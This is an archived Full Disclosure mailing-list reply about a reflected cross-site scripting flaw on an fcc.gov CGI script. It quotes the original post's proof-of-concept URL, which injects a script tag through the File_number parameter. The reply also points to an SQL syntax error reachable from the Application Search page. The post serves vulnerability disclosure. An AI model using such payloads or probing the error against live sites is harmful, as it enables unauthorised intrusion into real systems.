Full Disclosure mailing list archives

Re: fcc.gov XSS

From: "Zach C." <fxchip () gmail com>
Date: Mon, 24 May 2010 01:29:36 -0700

There seem to be a few more problems with that script than just that XSS...

For example, going to the Application Search page root (the page that takes
you to that one, presumably) and selecting literally everything in the
Services listbox will net you an error reporting "Incorrect syntax near ','"
for server 'HEIMDAL'. It apparently occurs on line 4. I dunno.

I'm not gonna mess around with it too much though :)

On Mon, May 24, 2010 at 12:58 AM, Marshall Whittaker <
marshallwhittaker () gmail com> wrote:

FCC.gov XSS

--- CODE ---


http://fjallfoss.fcc.gov/cgi-bin/ws.exe/prod/cdbs/pubacc/prod/leg_det.pl?Application_id=1186791&File_number=%3Cscript%20language=%22javascript%22%20type=%22text/javascript%22%3Ealert('h4x0r3d');%3C/script%3E<http://fjallfoss.fcc.gov/cgi-bin/ws.exe/prod/cdbs/pubacc/prod/leg_det.pl?Application_id=1186791&File_number=%3Cscript%20language=%22javascript%22%20type=%22text/javascript%22%3Ealert%28%27h4x0r3d%27%29;%3C/script%3E>

--- CODE ---

 --oxagast

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

fcc.gov XSS Marshall Whittaker (May 24)
- Re: fcc.gov XSS Zach C. (May 24)